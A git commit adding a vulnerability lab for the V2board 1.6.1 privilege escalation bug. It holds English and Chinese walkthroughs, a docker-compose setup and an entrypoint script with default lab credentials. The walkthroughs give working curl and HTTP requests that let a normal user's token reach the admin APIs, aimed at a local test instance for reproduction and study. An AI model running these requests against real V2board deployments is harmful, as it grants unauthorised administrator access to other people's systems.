first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/v2board/1.6-privilege-escalation/1.png
+++ b/v2board/1.6-privilege-escalation/1.png
--- a/v2board/1.6-privilege-escalation/2.png
+++ b/v2board/1.6-privilege-escalation/2.png
--- a/v2board/1.6-privilege-escalation/3.png
+++ b/v2board/1.6-privilege-escalation/3.png
--- a/v2board/1.6-privilege-escalation/README.md
+++ b/v2board/1.6-privilege-escalation/README.md
@@ -0,0 +1,59 @@
+# V2board 1.6.1 Privilege Escalation
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+V2board is a multiple proxy protocol manage panel application interface. In the version of 1.6.1, it is introduced a redis cache mechanism to save the user session.
+
+Since there is no distinction between administrator and normal user in the cache layer, resulting in normal users being able to use their token to access the administrator interface.
+
+References:
+
+- <https://github.com/v2board/v2board/commit/5976bcc65a61f7942ed4074b9274236d9d55d5f0>
+
+## Vulnerable Environment
+
+Execute following command to start the V2board 1.6.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://localhost:8080` to see the default login page of the V2board.
+
+## Exploit
+
+First of all, you have to register a normal user.
+
+Then, replace the email and password with your own data and login:
+
+```
+curl -i -s -k -XPOST --data-binary "email=example%40example.com&password=a123123123" http://localhost:8080/api/v1/passport/auth/login
+```
+
+The server will response a "auth_data" to you:
+
+![](1.png)
+
+Copy it and end the following request with your "auth_data":
+
+```
+GET /api/v1/user/info HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+Connection: close
+Authorization: ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkMVJpUFplR2RnZlFPSVRyWEM4dW0udW5QZVZNTGs3RlFFbkFVVnBwbEhmTlMyczdQaEpTa3E=
+Cache-Control: max-age=0
+
+
+```
+
+![](2.png)
+
+This step is to let server save your authorization to Redis cache.
+
+Finally, you are able to simply call all admin API with this authorization, for example `http://your-ip:8080/api/v1/admin/user/fetch`:
+
+![](3.png)
--- a/v2board/1.6-privilege-escalation/README.zh-cn.md
+++ b/v2board/1.6-privilege-escalation/README.zh-cn.md
@@ -0,0 +1,55 @@
+# V2board 1.6.1 提权漏洞
+
+V2board是一个多用户代理工具管理面板。在其1.6.1版本中，引入了对于用户Session的缓存机制，服务器会将用户的认证信息储存在Redis缓存中。
+
+但由于读取缓存时没有校验该用户是普通用户还是管理员，导致普通用户的认证信息即可访问管理员接口，造成提权漏洞。
+
+参考链接：
+
+- <https://github.com/v2board/v2board/commit/5976bcc65a61f7942ed4074b9274236d9d55d5f0>
+
+## 漏洞环境
+
+执行如下命令启动一个V2board 1.6.1版本服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://localhost:8080`即可查看到其登录页面。
+
+## 漏洞复现
+
+复现该漏洞，必须注册或找到一个普通用户账号。注册完成后，我们发送如下请求进行登录（将其中账号密码替换成你注册时使用的信息）：
+
+```
+curl -i -s -k -XPOST --data-binary "email=example%40example.com&password=a123123123" http://localhost:8080/api/v1/passport/auth/login
+```
+
+服务器会返回当前用户的认证信息“auth_data”：
+
+![](1.png)
+
+拷贝这个认证信息，并替换到如下数据包的`Authorization`头中，发送：
+
+```
+GET /api/v1/user/info HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+Connection: close
+Authorization: ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkMVJpUFplR2RnZlFPSVRyWEM4dW0udW5QZVZNTGs3RlFFbkFVVnBwbEhmTlMyczdQaEpTa3E=
+Cache-Control: max-age=0
+
+
+```
+
+![](2.png)
+
+这一步的目的是让服务器将我们的Authorization头写入缓存中。
+
+最后，只需要带上这个Authorization头，即可使用所有管理员API了。例如`http://your-ip:8080/api/v1/admin/user/fetch`
+
+![](3.png)
--- a/v2board/1.6-privilege-escalation/docker-compose.yml
+++ b/v2board/1.6-privilege-escalation/docker-compose.yml
@@ -0,0 +1,22 @@
+version: '2'
+services:
+  web:
+    image: vulhub/v2board:1.6.1
+    ports:
+     - "8080:80"
+    depends_on:
+     - db
+     - redis
+    entrypoint:
+     - bash
+     - /entrypoint.sh
+    volumes:
+     - ./entrypoint.sh:/entrypoint.sh
+    command: apache2-foreground
+  db:
+   image: mysql:5.7
+   environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=v2board
+  redis:
+   image: redis:7-alpine
--- a/v2board/1.6-privilege-escalation/entrypoint.sh
+++ b/v2board/1.6-privilege-escalation/entrypoint.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+set -ex
+
+wait-for-it db:3306 -t 300 -- echo "database is connected"
+if [[ ! -e ".env" ]]; then
+    echo -e "db\nv2board\nroot\nroot\nadmin@example.com\nexample123" | php artisan v2board:install
+    sed -i 's/REDIS_HOST=.*/REDIS_HOST=redis/g' .env
+fi
+
+chown www-data:www-data -R /var/www/html
+# first arg is `-f` or `--some-option`
+if [ "${1#-}" != "$1" ]; then
+	set -- apache2-foreground "$@"
+fi
+
+exec "$@"